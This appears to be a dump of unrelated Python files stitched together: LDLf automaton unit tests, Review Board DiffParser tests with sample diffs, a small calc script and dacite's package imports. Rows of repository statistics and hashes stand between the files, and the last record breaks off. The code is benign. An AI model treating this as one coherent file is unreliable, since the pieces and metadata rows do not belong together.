always_star_a_not_ff = PathExpressionAlways(PathExpressionStar(Not(atomic_a)), ff)
x = self.ldlf_a.to_nfa(always_star_a_not_ff)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
}
final_states = {frozenset()}
initial_state = {frozenset([always_star_a_not_ff])}
states = {frozenset(), frozenset([always_star_a_not_ff])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000035_alphabet_a_always_star_not_a_ff.NFA", "./tests/automata/nfa")
print_dfa(x, "000035_alphabet_a_always_star_not_a_ff.DFA", "./tests/automata/dfa")
def test_to_nfa_alphabet_a_always_star_not_a_a(self):
"""<not-a*>tt"""
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
ff = LogicalFalse()
always_star_not_a_a = PathExpressionAlways(PathExpressionStar(Not(atomic_a)), atomic_a)
nnf_always_star_not_a_a = \
PathExpressionAlways(PathExpressionStar(Not(atomic_a)), PathExpressionAlways(Not(atomic_a), ff))
x = self.ldlf_a.to_nfa(always_star_not_a_a)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({nnf_always_star_not_a_a}), frozenset(), frozenset({nnf_always_star_not_a_a, ff})),
(frozenset({nnf_always_star_not_a_a}), frozenset({a}), frozenset({})),
}
final_states = {frozenset(), frozenset({nnf_always_star_not_a_a})}
initial_state = {frozenset([nnf_always_star_not_a_a])}
states = {frozenset(), frozenset([nnf_always_star_not_a_a]), frozenset([ff, nnf_always_star_not_a_a])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000036_alphabet_a_always_star_not_a_a.NFA", "./tests/automata/nfa")
print_dfa(x, "000036_alphabet_a_always_star_not_a_a.DFA", "./tests/automata/dfa")
def test_to_nfa_alphabet_a_always_star_not_a_end(self):
"""<not-a*>tt"""
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
ff = LogicalFalse()
always_star_not_a_a = PathExpressionAlways(PathExpressionStar(Not(atomic_a)), End())
nnf_always_star_not_a_a = \
PathExpressionAlways(PathExpressionStar(Not(atomic_a)), PathExpressionAlways(TrueFormula(), ff))
x = self.ldlf_a.to_nfa(always_star_not_a_a)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({nnf_always_star_not_a_a}), frozenset(), frozenset({nnf_always_star_not_a_a, ff})),
(frozenset({nnf_always_star_not_a_a}), frozenset({a}), frozenset({ff})),
}
final_states = {frozenset(), frozenset({nnf_always_star_not_a_a})}
initial_state = {frozenset([nnf_always_star_not_a_a])}
states = {frozenset(), frozenset([ff]), frozenset([nnf_always_star_not_a_a]), frozenset([ff, nnf_always_star_not_a_a])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000037_alphabet_a_always_star_not_a_end.NFA", "./tests/automata/nfa")
print_dfa(x, "000037_alphabet_a_always_star_not_a_end.DFA", "./tests/automata/dfa")
def test_to_nfa_alphabet_abc_starred_sequences(self):
atomic_a = AtomicFormula(self.a_sym)
atomic_b = AtomicFormula(self.b_sym)
atomic_c = AtomicFormula(self.c_sym)
tt = LogicalTrue()
ff = LogicalFalse()
star_b = PathExpressionStar(atomic_b)
# sequence_a_b = PathExpressionSequence(atomic_a, atomic_b)
# star_sequence_a_b = PathExpressionStar(sequence_a_b)
sequence_a_star_b = PathExpressionSequence(atomic_a, star_b)
sequence_abSc = PathExpressionSequence(sequence_a_star_b, atomic_c)
# sequence_abc = PathExpressionSequence(sequence_a_b, atomic_c)
star_seq_abSc = PathExpressionStar(sequence_abSc)
main = PathExpressionEventually(star_seq_abSc, End())
x = self.ldlf_abc.to_nfa(main)
nnf_end = PathExpressionAlways(TrueFormula(), ff)
nnf_main = PathExpressionEventually(star_seq_abSc, nnf_end)
e_star_b_e_c_main = PathExpressionEventually(star_b, PathExpressionEventually(atomic_c, nnf_main))
# pprint(x)
alphabet = {
frozenset(), frozenset([self.a_sym]), frozenset([self.b_sym]), frozenset([self.c_sym]),
frozenset([self.a_sym, self.b_sym]), frozenset([self.a_sym, self.c_sym]), frozenset([self.b_sym, self.c_sym]),
frozenset([self.a_sym, self.b_sym, self.c_sym])
}
states = {
frozenset([nnf_main]),
frozenset([ff]),
frozenset([e_star_b_e_c_main]),
frozenset()
}
initial_states = {
frozenset([nnf_main]),
}
final_states = {
frozenset([nnf_main]),
frozenset()
}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({self.a_sym}), frozenset()),
(frozenset(), frozenset({self.b_sym}), frozenset()),
(frozenset(), frozenset({self.c_sym}), frozenset()),
(frozenset(), frozenset({self.a_sym, self.b_sym}), frozenset()),
(frozenset(), frozenset({self.a_sym, self.c_sym}), frozenset()),
(frozenset(), frozenset({self.b_sym, self.c_sym}), frozenset()),
(frozenset(), frozenset({self.a_sym, self.b_sym, self.c_sym}), frozenset()),
(frozenset([nnf_main]), frozenset(), frozenset({ff})),
(frozenset([nnf_main]), frozenset({self.a_sym}), frozenset({ff})),
(frozenset([nnf_main]), frozenset({self.b_sym}), frozenset({ff})),
(frozenset([nnf_main]), frozenset({self.c_sym}), frozenset({ff})),
(frozenset([nnf_main]), frozenset({self.a_sym, self.b_sym}), frozenset({ff})),
(frozenset([nnf_main]), frozenset({self.a_sym, self.c_sym}), frozenset({ff})),
(frozenset([nnf_main]), frozenset({self.b_sym, self.c_sym}), frozenset({ff})),
(frozenset([nnf_main]), frozenset({self.a_sym, self.b_sym, self.c_sym}), frozenset({ff})),
(frozenset([nnf_main]), frozenset({self.a_sym}), frozenset({e_star_b_e_c_main})),
(frozenset([nnf_main]), frozenset({self.a_sym, self.b_sym}), frozenset({e_star_b_e_c_main})),
(frozenset([nnf_main]), frozenset({self.a_sym, self.c_sym}), frozenset({e_star_b_e_c_main})),
(frozenset([nnf_main]), frozenset({self.a_sym, self.b_sym, self.c_sym}), frozenset({e_star_b_e_c_main})),
(frozenset([e_star_b_e_c_main]), frozenset({self.c_sym}), frozenset({nnf_main})),
(frozenset([e_star_b_e_c_main]), frozenset({self.a_sym, self.c_sym}), frozenset({nnf_main})),
(frozenset([e_star_b_e_c_main]), frozenset({self.b_sym, self.c_sym}), frozenset({nnf_main})),
(frozenset([e_star_b_e_c_main]), frozenset({self.a_sym, self.b_sym, self.c_sym}), frozenset({nnf_main})),
(frozenset([e_star_b_e_c_main]), frozenset({self.b_sym}), frozenset({e_star_b_e_c_main})),
(frozenset([e_star_b_e_c_main]), frozenset({self.a_sym, self.b_sym}), frozenset({e_star_b_e_c_main})),
(frozenset([e_star_b_e_c_main]), frozenset({self.b_sym, self.c_sym}), frozenset({e_star_b_e_c_main})),
(frozenset([e_star_b_e_c_main]), frozenset({self.a_sym, self.b_sym, self.c_sym}), frozenset({e_star_b_e_c_main})),
}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_states)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "001000_alphabet_abc_starred_sequences.NFA", "./tests/automata/nfa")
print_dfa(x, "001000_alphabet_abc_starred_sequences.DFA", "./tests/automata/dfa")
def test_to_nfa_alphabet_abc_eventually_union_a_star_b_end(self):
atomic_a = AtomicFormula(self.a_sym)
atomic_b = AtomicFormula(self.b_sym)
atomic_c = AtomicFormula(self.c_sym)
tt = LogicalTrue()
ff = LogicalFalse()
star_b = PathExpressionStar(atomic_b)
main = PathExpressionEventually(PathExpressionUnion(atomic_a, star_b), End())
x = self.ldlf_abc.to_nfa(main)
nnf_end = PathExpressionAlways(TrueFormula(), ff)
nnf_main = PathExpressionEventually(PathExpressionUnion(atomic_a, star_b), nnf_end)
eventually_star_b_end = PathExpressionEventually(star_b, nnf_end)
# pprint(x)
alphabet = {
frozenset(), frozenset([self.a_sym]), frozenset([self.b_sym]), frozenset([self.c_sym]),
frozenset([self.a_sym, self.b_sym]), frozenset([self.a_sym, self.c_sym]), frozenset([self.b_sym, self.c_sym]),
frozenset([self.a_sym, self.b_sym, self.c_sym])
}
states = {
frozenset([nnf_main]),
frozenset([ff]),
frozenset([nnf_end]),
frozenset([eventually_star_b_end]),
frozenset()
}
initial_states = {
frozenset([nnf_main]),
}
final_states = {
frozenset(),
frozenset([nnf_main]),
frozenset([nnf_end]),
frozenset([eventually_star_b_end]),
}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({self.a_sym}), frozenset()),
(frozenset(), frozenset({self.b_sym}), frozenset()),
(frozenset(), frozenset({self.c_sym}), frozenset()),
(frozenset(), frozenset({self.a_sym, self.b_sym}), frozenset()),
(frozenset(), frozenset({self.a_sym, self.c_sym}), frozenset()),
(frozenset(), frozenset({self.b_sym, self.c_sym}), frozenset()),
(frozenset(), frozenset({self.a_sym, self.b_sym, self.c_sym}), frozenset()),
(frozenset([nnf_main]), frozenset(), frozenset({ff})),
(frozenset([nnf_main]), frozenset({self.a_sym}), frozenset({ff})),
(frozenset([nnf_main]), frozenset({self.b_sym}), frozenset({ff})),
(frozenset([nnf_main]), frozenset({self.c_sym}), frozenset({ff})),
(frozenset([nnf_main]), frozenset({self.a_sym, self.b_sym}), frozenset({ff})),
(frozenset([nnf_main]), frozenset({self.a_sym, self.c_sym}), frozenset({ff})),
(frozenset([nnf_main]), frozenset({self.b_sym, self.c_sym}), frozenset({ff})),
(frozenset([nnf_main]), frozenset({self.a_sym, self.b_sym, self.c_sym}), frozenset({ff})),
(frozenset([nnf_main]), frozenset({self.a_sym}), frozenset({nnf_end})),
(frozenset([nnf_main]), frozenset({self.a_sym, self.b_sym}), frozenset({nnf_end})),
(frozenset([nnf_main]), frozenset({self.a_sym, self.c_sym}), frozenset({nnf_end})),
(frozenset([nnf_main]), frozenset({self.a_sym, self.b_sym, self.c_sym}), frozenset({nnf_end})),
(frozenset([nnf_main]), frozenset({self.b_sym}), frozenset({eventually_star_b_end})),
(frozenset([nnf_main]), frozenset({self.a_sym, self.b_sym}), frozenset({eventually_star_b_end})),
(frozenset([nnf_main]), frozenset({self.b_sym, self.c_sym}), frozenset({eventually_star_b_end})),
(frozenset([nnf_main]), frozenset({self.a_sym, self.b_sym, self.c_sym}), frozenset({eventually_star_b_end})),
(frozenset([eventually_star_b_end]), frozenset({self.b_sym}), frozenset({eventually_star_b_end})),
(frozenset([eventually_star_b_end]), frozenset({self.b_sym, self.a_sym}), frozenset({eventually_star_b_end})),
(frozenset([eventually_star_b_end]), frozenset({self.b_sym, self.c_sym}), frozenset({eventually_star_b_end})),
(frozenset([eventually_star_b_end]), frozenset({self.b_sym, self.a_sym, self.c_sym}), frozenset({eventually_star_b_end})),
(frozenset([eventually_star_b_end]), frozenset(), frozenset({ff})),
(frozenset([eventually_star_b_end]), frozenset({self.a_sym}), frozenset({ff})),
(frozenset([eventually_star_b_end]), frozenset({self.b_sym}), frozenset({ff})),
(frozenset([eventually_star_b_end]), frozenset({self.c_sym}), frozenset({ff})),
(frozenset([eventually_star_b_end]), frozenset({self.a_sym, self.b_sym}), frozenset({ff})),
(frozenset([eventually_star_b_end]), frozenset({self.a_sym, self.c_sym}), frozenset({ff})),
(frozenset([eventually_star_b_end]), frozenset({self.b_sym, self.c_sym}), frozenset({ff})),
(frozenset([eventually_star_b_end]), frozenset({self.a_sym, self.b_sym, self.c_sym}), frozenset({ff})),
(frozenset([nnf_end]), frozenset(), frozenset({ff})),
(frozenset([nnf_end]), frozenset({self.a_sym}), frozenset({ff})),
(frozenset([nnf_end]), frozenset({self.b_sym}), frozenset({ff})),
(frozenset([nnf_end]), frozenset({self.c_sym}), frozenset({ff})),
(frozenset([nnf_end]), frozenset({self.a_sym, self.b_sym}), frozenset({ff})),
(frozenset([nnf_end]), frozenset({self.a_sym, self.c_sym}), frozenset({ff})),
(frozenset([nnf_end]), frozenset({self.b_sym, self.c_sym}), frozenset({ff})),
(frozenset([nnf_end]), frozenset({self.a_sym, self.b_sym, self.c_sym}), frozenset({ff})),
}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_states)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "001001_alphabet_abc_eventually_union_a_star_b_end.NFA", "./tests/automata/nfa")
print_dfa(x, "001001_alphabet_abc_eventually_union_a_star_b_end.DFA", "./tests/automata/dfa")
def test_to_nfa_alphabet_abc_always_union_a_b_end(self):
atomic_a = AtomicFormula(self.a_sym)
atomic_b = AtomicFormula(self.b_sym)
atomic_c = AtomicFormula(self.c_sym)
tt = LogicalTrue()
ff = LogicalFalse()
star_b = PathExpressionStar(atomic_b)
main = PathExpressionAlways(PathExpressionUnion(atomic_a, atomic_b), End())
x = self.ldlf_abc.to_nfa(main)
nnf_end = PathExpressionAlways(TrueFormula(), ff)
nnf_main = PathExpressionAlways(PathExpressionUnion(atomic_a, atomic_b), nnf_end)
eventually_star_b_end = PathExpressionEventually(star_b, nnf_end)
# pprint(x)
alphabet = {
frozenset(), frozenset([self.a_sym]), frozenset([self.b_sym]), frozenset([self.c_sym]),
frozenset([self.a_sym, self.b_sym]), frozenset([self.a_sym, self.c_sym]), frozenset([self.b_sym, self.c_sym]),
frozenset([self.a_sym, self.b_sym, self.c_sym])
}
states = {
frozenset([nnf_main]),
frozenset([ff]),
frozenset([nnf_end]),
frozenset()
}
initial_states = {
frozenset([nnf_main]),
}
final_states = {
frozenset(),
frozenset([nnf_main]),
frozenset([nnf_end]),
}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({self.a_sym}), frozenset()),
(frozenset(), frozenset({self.b_sym}), frozenset()),
(frozenset(), frozenset({self.c_sym}), frozenset()),
(frozenset(), frozenset({self.a_sym, self.b_sym}), frozenset()),
(frozenset(), frozenset({self.a_sym, self.c_sym}), frozenset()),
(frozenset(), frozenset({self.b_sym, self.c_sym}), frozenset()),
(frozenset(), frozenset({self.a_sym, self.b_sym, self.c_sym}), frozenset()),
(frozenset([nnf_main]), frozenset(), frozenset({})),
(frozenset([nnf_main]), frozenset({self.a_sym}), frozenset({nnf_end})),
(frozenset([nnf_main]), frozenset({self.b_sym}), frozenset({nnf_end})),
(frozenset([nnf_main]), frozenset({self.c_sym}), frozenset({})),
(frozenset([nnf_main]), frozenset({self.a_sym, self.b_sym}), frozenset({nnf_end})),
(frozenset([nnf_main]), frozenset({self.a_sym, self.c_sym}), frozenset({nnf_end})),
(frozenset([nnf_main]), frozenset({self.b_sym, self.c_sym}), frozenset({nnf_end})),
(frozenset([nnf_main]), frozenset({self.a_sym, self.b_sym, self.c_sym}), frozenset({nnf_end})),
(frozenset([nnf_end]), frozenset(), frozenset({ff})),
(frozenset([nnf_end]), frozenset({self.a_sym}), frozenset({ff})),
(frozenset([nnf_end]), frozenset({self.b_sym}), frozenset({ff})),
(frozenset([nnf_end]), frozenset({self.c_sym}), frozenset({ff})),
(frozenset([nnf_end]), frozenset({self.a_sym, self.b_sym}), frozenset({ff})),
(frozenset([nnf_end]), frozenset({self.a_sym, self.c_sym}), frozenset({ff})),
(frozenset([nnf_end]), frozenset({self.b_sym, self.c_sym}), frozenset({ff})),
(frozenset([nnf_end]), frozenset({self.a_sym, self.b_sym, self.c_sym}), frozenset({ff})),
}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_states)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "001002_alphabet_abc_always_union_a_b_end.NFA", "./tests/automata")
print_dfa(x, "001002_alphabet_abc_always_union_a_b_end.DFA", "./tests/automata")
def test_sequence_star_annidations(self):
atomic_a = AtomicFormula(self.a_sym)
atomic_b = AtomicFormula(self.b_sym)
atomic_c = AtomicFormula(self.c_sym)
# main = PathExpressionEventually(
# PathExpressionStar(
# PathExpressionSequence(
# PathExpressionSequence(atomic_a, PathExpressionStar(atomic_b)),
# atomic_c)),
# End()
# )
main = PathExpressionEventually(
PathExpressionStar(
PathExpressionSequence(
PathExpressionStar(PathExpressionSequence(atomic_a, atomic_b)),
atomic_c),
),
End()
)
x = self.ldlf_abc.to_nfa(main)
# pprint(x)
if self.print_automata:
print_nfa(x, "002003_alphabet_abc_<((a;b)*;c)*>end.NFA", "./tests/automata/dfa")
print_dfa(x, "002003_alphabet_abc_<((a;b)*;c)*>end.DFA", "./tests/automata/nfa")
dfa = _to_pythomata_dfa(x)
empty = frozenset()
a = frozenset({self.a_sym})
b = frozenset({self.b_sym})
c = frozenset({self.c_sym})
ab = a.union(b)
ac = a.union(c)
bc = b.union(c)
abc = ab.union(c)
not_ = frozenset({})
self.assertTrue (dfa.word_acceptance([]))
self.assertFalse(dfa.word_acceptance([a]))
self.assertFalse(dfa.word_acceptance([b]))
self.assertTrue (dfa.word_acceptance([c]))
self.assertFalse(dfa.word_acceptance([ab]))
self.assertTrue (dfa.word_acceptance([ac]))
self.assertTrue (dfa.word_acceptance([bc]))
self.assertTrue (dfa.word_acceptance([abc]))
self.assertFalse(dfa.word_acceptance([not_]))
self.assertFalse(dfa.word_acceptance([a, b]))
self.assertTrue(dfa.word_acceptance([a, b, c]))
self.assertFalse(dfa.word_acceptance([a, a, c]))
self.assertFalse(dfa.word_acceptance([a, b, abc, ab]))
self.assertTrue(dfa.word_acceptance([a, b, abc, ab, c]))
| 47.429991 | 159 | 0.629832 | 12,810 | 109,753 | 5.030991 | 0.015379 | 0.117306 | 0.054603 | 0.039102 | 0.918103 | 0.892066 | 0.864183 | 0.812218 | 0.760718 | 0.719242 | 0 | 0.006575 | 0.235037 | 109,753 | 2,313 | 160 | 47.450497 | 0.761044 | 0.020737 | 0 | 0.611915 | 0 | 0 | 0.069199 | 0.032455 | 0 | 0 | 0 | 0 | 0.286192 | 1 | 0.030067 | false | 0 | 0.005011 | 0 | 0.038419 | 0.071826 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1352cceaf1a22adfffeb581e078586c7ee8c0d55 | 7,564 | py | Python | reviewboard/diffviewer/tests/test_diff_parser.py | b1pb1p/reviewboard | b13aca3b88bc16d3c4258adce5df79cd1da577d3 | [
"MIT"
] | null | null | null | reviewboard/diffviewer/tests/test_diff_parser.py | b1pb1p/reviewboard | b13aca3b88bc16d3c4258adce5df79cd1da577d3 | [
"MIT"
] | null | null | null | reviewboard/diffviewer/tests/test_diff_parser.py | b1pb1p/reviewboard | b13aca3b88bc16d3c4258adce5df79cd1da577d3 | [
"MIT"
] | null | null | null | from __future__ import unicode_literals
from djblets.testing.decorators import add_fixtures
from reviewboard.diffviewer.parser import DiffParser
from reviewboard.testing import TestCase
class DiffParserTest(TestCase):
"""Unit tests for DiffParser."""
def test_form_feed(self):
"""Testing DiffParser with a form feed in the file"""
data = (
b'--- README 123\n'
b'+++ README (new)\n'
b'@@ -1,4 +1,6 @@\n'
b' Line 1\n'
b' Line 2\n'
b'+\x0c\n'
b'+Inserted line\n'
b' Line 3\n'
b' Line 4\n')
files = DiffParser(data).parse()
self.assertEqual(len(files), 1)
self.assertEqual(files[0].insert_count, 2)
self.assertEqual(files[0].delete_count, 0)
self.assertEqual(files[0].data, data)
def test_line_counts(self):
"""Testing DiffParser with insert/delete line counts"""
diff = (
b'+ This is some line before the change\n'
b'- And another line\n'
b'Index: foo\n'
b'- One last.\n'
b'--- README 123\n'
b'+++ README (new)\n'
b'@@ -1,1 +1,1 @@\n'
b'-blah blah\n'
b'-blah\n'
b'+blah!\n'
b'-blah...\n'
b'+blah?\n'
b'-blah!\n'
b'+blah?!\n')
files = DiffParser(diff).parse()
self.assertEqual(len(files), 1)
self.assertEqual(files[0].insert_count, 3)
self.assertEqual(files[0].delete_count, 4)
@add_fixtures(['test_scmtools'])
def test_raw_diff_with_diffset(self):
"""Testing DiffParser.raw_diff with DiffSet"""
repository = self.create_repository(tool_name='Test')
diffset = self.create_diffset(repository=repository)
self.create_diffcommit(
diffset=diffset,
commit_id='r1',
parent_id='r0',
diff_contents=(
b'diff --git a/ABC b/ABC\n'
b'index 94bdd3e..197009f 100644\n'
b'--- ABC\n'
b'+++ ABC\n'
b'@@ -1,1 +1,1 @@\n'
b'-line!\n'
b'+line..\n'
))
self.create_diffcommit(
diffset=diffset,
commit_id='r2',
parent_id='r1',
diff_contents=(
b'diff --git a/README b/README\n'
b'index 94bdd3e..197009f 100644\n'
b'--- README\n'
b'+++ README\n'
b'@@ -1,1 +1,1 @@\n'
b'-Hello, world!\n'
b'+Hi, world!\n'
))
self.create_diffcommit(
diffset=diffset,
commit_id='r4',
parent_id='r3',
diff_contents=(
b'diff --git a/README b/README\n'
b'index 197009f..87abad9 100644\n'
b'--- README\n'
b'+++ README\n'
b'@@ -1,1 +1,1 @@\n'
b'-Hi, world!\n'
b'+Yo, world.\n'
))
cumulative_diff = (
b'diff --git a/ABC b/ABC\n'
b'index 94bdd3e..197009f 100644\n'
b'--- ABC\n'
b'+++ ABC\n'
b'@@ -1,1 +1,1 @@\n'
b'-line!\n'
b'+line..\n'
b'diff --git a/README b/README\n'
b'index 94bdd3e..87abad9 100644\n'
b'--- README\n'
b'+++ README\n'
b'@@ -1,1 +1,1 @@\n'
b'-Hello, world!\n'
b'+Yo, world.\n'
)
diffset.finalize_commit_series(
cumulative_diff=cumulative_diff,
validation_info=None,
validate=False,
save=True)
parser = DiffParser(b'')
self.assertEqual(parser.raw_diff(diffset), cumulative_diff)
@add_fixtures(['test_scmtools'])
def test_raw_diff_with_diffcommit(self):
"""Testing DiffParser.raw_diff with DiffCommit"""
repository = self.create_repository(tool_name='Test')
diffset = self.create_diffset(repository=repository)
commit1_diff = (
b'diff --git a/ABC b/ABC\n'
b'index 94bdd3e..197009f 100644\n'
b'--- ABC\n'
b'+++ ABC\n'
b'@@ -1,1 +1,1 @@\n'
b'-line!\n'
b'+line..\n'
b'diff --git a/FOO b/FOO\n'
b'index 84bda3e..b975034 100644\n'
b'--- FOO\n'
b'+++ FOO\n'
b'@@ -1,1 +0,0 @@\n'
b'-Some line\n'
)
commit1 = self.create_diffcommit(
diffset=diffset,
commit_id='r1',
parent_id='r0',
diff_contents=commit1_diff)
self.create_diffcommit(
diffset=diffset,
commit_id='r2',
parent_id='r1',
diff_contents=(
b'diff --git a/README b/README\n'
b'index 94bdd3e..197009f 100644\n'
b'--- README\n'
b'+++ README\n'
b'@@ -1,1 +1,1 @@\n'
b'-Hello, world!\n'
b'+Hi, world!\n'
))
self.create_diffcommit(
diffset=diffset,
commit_id='r4',
parent_id='r3',
diff_contents=(
b'diff --git a/README b/README\n'
b'index 197009f..87abad9 100644\n'
b'--- README\n'
b'+++ README\n'
b'@@ -1,1 +1,1 @@\n'
b'-Hi, world!\n'
b'+Yo, world.\n'
))
diffset.finalize_commit_series(
cumulative_diff=(
b'diff --git a/ABC b/ABC\n'
b'index 94bdd3e..197009f 100644\n'
b'--- ABC\n'
b'+++ ABC\n'
b'@@ -1,1 +1,1 @@\n'
b'-line!\n'
b'+line..\n'
b'diff --git a/FOO b/FOO\n'
b'index 84bda3e..b975034 100644\n'
b'--- FOO\n'
b'+++ FOO\n'
b'@@ -1,1 +0,0 @@\n'
b'-Some line\n'
b'diff --git a/README b/README\n'
b'index 94bdd3e..87abad9 100644\n'
b'--- README\n'
b'+++ README\n'
b'@@ -1,1 +1,1 @@\n'
b'-Hello, world!\n'
b'+Yo, world.\n'
),
validation_info=None,
validate=False,
save=True)
parser = DiffParser(b'')
self.assertEqual(parser.raw_diff(commit1), commit1_diff)
def test_extra_data(self):
"""Testing custom DiffParser populating extra_data"""
class CustomParser(DiffParser):
def parse_diff_header(self, linenum, info):
info['extra_data'] = {'foo': True}
return super(CustomParser, self).parse_diff_header(
linenum, info)
diff = (
b'+ This is some line before the change\n'
b'- And another line\n'
b'Index: foo\n'
b'- One last.\n'
b'--- README 123\n'
b'+++ README (new)\n'
b'@@ -1,1 +1,1 @@\n'
b'-blah blah\n'
b'-blah\n'
b'+blah!\n'
b'-blah...\n'
b'+blah?\n'
b'-blah!\n'
b'+blah?!\n')
files = CustomParser(diff).parse()
self.assertEqual(len(files), 1)
self.assertEqual(files[0].extra_data, {'foo': True})
| 31.648536 | 67 | 0.448572 | 903 | 7,564 | 3.665559 | 0.126246 | 0.065257 | 0.021752 | 0.048943 | 0.763746 | 0.763746 | 0.725076 | 0.725076 | 0.725076 | 0.700302 | 0 | 0.061723 | 0.404548 | 7,564 | 238 | 68 | 31.781513 | 0.673179 | 0.033977 | 0 | 0.803828 | 0 | 0 | 0.274327 | 0 | 0 | 0 | 0 | 0 | 0.052632 | 1 | 0.028708 | false | 0 | 0.019139 | 0 | 0.062201 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1375e404f3a394c4bbb56eca2978c554563a8d94 | 83 | py | Python | imports/calc_import.py | yusabana-sandbox/python-practice | 1698bf4979a1e09fe166ac36507c363f95564eeb | [
"MIT"
] | null | null | null | imports/calc_import.py | yusabana-sandbox/python-practice | 1698bf4979a1e09fe166ac36507c363f95564eeb | [
"MIT"
] | null | null | null | imports/calc_import.py | yusabana-sandbox/python-practice | 1698bf4979a1e09fe166ac36507c363f95564eeb | [
"MIT"
] | null | null | null | # vim: fileencoding=utf-8
import calc
print(calc.add(1, 2))
print(calc.sub(1, 2))
| 13.833333 | 25 | 0.686747 | 16 | 83 | 3.5625 | 0.6875 | 0.315789 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068493 | 0.120482 | 83 | 5 | 26 | 16.6 | 0.712329 | 0.277108 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0.666667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
138a0a681098fab43521d30ef1a1954f6596c394 | 527 | py | Python | dacite/__init__.py | daiwt/dacite | 9fe2f3d5fabc44bde4b0ba28eda44f8071c358cc | [
"MIT"
] | 971 | 2018-03-06T19:53:24.000Z | 2022-03-31T11:53:00.000Z | dacite/__init__.py | daiwt/dacite | 9fe2f3d5fabc44bde4b0ba28eda44f8071c358cc | [
"MIT"
] | 142 | 2018-04-19T00:37:01.000Z | 2022-03-29T00:18:08.000Z | dacite/__init__.py | daiwt/dacite | 9fe2f3d5fabc44bde4b0ba28eda44f8071c358cc | [
"MIT"
] | 63 | 2018-03-31T16:05:16.000Z | 2022-03-28T12:24:13.000Z | from dacite.config import Config
from dacite.core import from_dict
from dacite.exceptions import (
DaciteError,
DaciteFieldError,
WrongTypeError,
MissingValueError,
UnionMatchError,
StrictUnionMatchError,
ForwardReferenceError,
UnexpectedDataError,
)
__all__ = [
"Config",
"from_dict",
"DaciteError",
"DaciteFieldError",
"WrongTypeError",
"MissingValueError",
"UnionMatchError",
"StrictUnionMatchError",
"ForwardReferenceError",
"UnexpectedDataError",
]
| 20.269231 | 33 | 0.70778 | 35 | 527 | 10.485714 | 0.457143 | 0.081744 | 0.223433 | 0.316076 | 0.730245 | 0.730245 | 0.730245 | 0.730245 | 0 | 0 | 0 | 0 | 0.204934 | 527 | 25 | 34 | 21.08 | 0.875895 | 0 | 0 | 0 | 0 | 0 | 0.282732 | 0.079696 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0 | 0 | 0 | 1 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
13a0dff32a551463f295bbef33c5df6a8a6c9560 | 24 | py | Python | py_schema/__init__.py | benhurott/py_schema | a0beab16bd91760942dc88942a65b480ec980ad8 | [
"MIT"
] | null | null | null | py_schema/__init__.py | benhurott/py_schema | a0beab16bd91760942dc88942a65b480ec980ad8 | [
"MIT"
